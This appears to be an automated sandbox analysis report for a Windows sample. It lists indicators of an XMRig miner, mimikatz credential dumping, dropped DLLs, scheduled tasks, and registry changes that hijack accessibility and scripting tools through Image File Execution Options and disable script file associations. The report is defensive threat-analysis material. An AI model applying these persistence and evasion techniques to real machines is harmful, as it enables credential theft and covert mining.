Analysis
-
max time kernel
174s -
max time network
204s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
22-06-2022 00:29
Behavioral task
behavioral1
Sample
2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe
Resource
win7-20220414-en
General
-
Target
2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe
-
Size
4.7MB
-
MD5
e2f922fc8900ca88a305101ed7820c53
-
SHA1
6465e375ef71d1df58f532c6cd3db60f9534e69e
-
SHA256
2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770
-
SHA512
f903de003ea31cbe7deb2f87fd94a46e172534665f7bfa370d2c541971b349ee31c7763c6e34788705941fa4006bd73cb1c974e3e23e54106068ca6413247475
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
XMRig Miner Payload 7 IoCs
Processes:
resource yara_rule C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe xmrig C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe xmrig C:\Windows\Temp\Networks\taskmgr.exe xmrig C:\Windows\TEMP\Networks\taskmgr.exe xmrig C:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe xmrig C:\Windows\IME\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe xmrig C:\Windows\IME\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe xmrig -
mimikatz is an open source tool to dump credentials on Windows 6 IoCs
Processes:
resource yara_rule C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe mimikatz C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe mimikatz behavioral2/memory/1992-170-0x00007FF6BDF80000-0x00007FF6BE06E000-memory.dmp mimikatz C:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe mimikatz C:\Windows\IME\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe mimikatz C:\Windows\IME\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe mimikatz -
Executes dropped EXE 8 IoCs
Processes:
2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exevfshost.exetaskmgr.exewimnat.exeGoogleCdoeUpdate.exenslfoo.exe2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exepid process 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 1992 vfshost.exe 492 taskmgr.exe 3760 wimnat.exe 1032 GoogleCdoeUpdate.exe 3588 nslfoo.exe 5788 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 6040 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe -
Sets file execution options in registry 2 TTPs 10 IoCs
Processes:
2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe -
Processes:
resource yara_rule C:\Windows\InfusedAppe\Corporate\vfshost.exe upx C:\Windows\InfusedAppe\Corporate\vfshost.exe upx behavioral2/memory/1992-147-0x00007FF6BDF80000-0x00007FF6BE06E000-memory.dmp upx behavioral2/memory/1992-170-0x00007FF6BDF80000-0x00007FF6BE06E000-memory.dmp upx -
Creates a Windows Service
-
Drops file in System32 directory 2 IoCs
Processes:
wimnat.exedescription ioc process File created C:\Windows\SysWOW64\nslfoo.exe wimnat.exe File opened for modification C:\Windows\SysWOW64\nslfoo.exe wimnat.exe -
Drops file in Windows directory 64 IoCs
Processes:
2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.execmd.exeGoogleCdoeUpdate.exe2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exedescription ioc process File created C:\Windows\InfusedAppe\LocalService\AppCapture_x64.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\UnattendGC\svchost.xml 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\xdvl-0.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\spoolsrv.xml 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\trch-1.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\Corporate\vfshost.exe 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File opened for modification C:\Windows\InfusedAppe\Corporate\log.txt cmd.exe File created C:\Windows\InfusedAppe\LocalService\specials\spoolsrv.exe 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\LocalService\specials\tibe-2.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\Corporate\scvhost.exe 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\cnli-1.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\tibe-2.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\LocalService\specials\cnli-1.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\crli-0.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\trfo-2.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\LocalService\specials\spoolsrv.xml 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\spoolsrv.exe 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\zlib1.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\posh-0.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File opened for modification C:\Windows\spoolsrv.xml 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\LocalService\specials\svchost.xml 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File opened for modification C:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File opened for modification C:\Windows\InfusedAppe\Priess\Result.txt GoogleCdoeUpdate.exe File opened for modification C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\Priess\GoogleCdoeUpdate.exe 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\libxml2.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\LocalService\specials\trch-1.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\LocalService\specials\ucl.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\exma-1.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\svchost.exe 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\svchost.xml 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\LocalService\spoolsrv.xml 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\LocalService\specials\xdvl-0.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\Corporate\mimidrv.sys 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\LocalService\specials\coli-0.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\LocalService\specials\libxml2.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\Priess\ip.txt 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File opened for modification C:\Windows\svchost.xml 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\LocalService\svchost.xml 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\ucl.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\svchost.xml 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\LocalService\AppCapture_x32.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\LocalService\specials\tucl-1.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\ssleay32.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\spoolsrv.xml 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\LocalService\specials\ssleay32.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File opened for modification C:\Windows\InfusedAppe\Priess\ip.txt 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\LocalService\specials\svchost.exe 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\LocalService\specials\trfo-2.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\LocalService\specials\zlib1.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\UnattendGC\AppCapture_x32.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\coli-0.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\tucl-1.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\LocalService\specials\crli-0.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\LocalService\specials\libeay32.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\LocalService\specials\posh-0.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\Corporate\mimilib.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\UnattendGC\AppCapture_x64.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\UnattendGC\spoolsrv.xml 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\libeay32.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\LocalService\specials\exma-1.dll 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe File created C:\Windows\InfusedAppe\Priess\scan.bat 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid process 4988 sc.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
nslfoo.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 nslfoo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz nslfoo.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 3076 schtasks.exe 1328 schtasks.exe 2400 schtasks.exe -
Modifies data under HKEY_USERS 10 IoCs
Processes:
nslfoo.exe2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft nslfoo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie nslfoo.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum nslfoo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Key created \REGISTRY\USER\.DEFAULT\Software nslfoo.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum\Version = "7" nslfoo.exe -
Modifies registry class 6 IoCs
Processes:
2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exevfshost.exenslfoo.exepid process 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 1992 vfshost.exe 1992 vfshost.exe 1992 vfshost.exe 1992 vfshost.exe 1992 vfshost.exe 1992 vfshost.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 3588 nslfoo.exe 3588 nslfoo.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskmgr.exe2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exevfshost.exedescription pid process Token: SeLockMemoryPrivilege 492 taskmgr.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 1992 vfshost.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 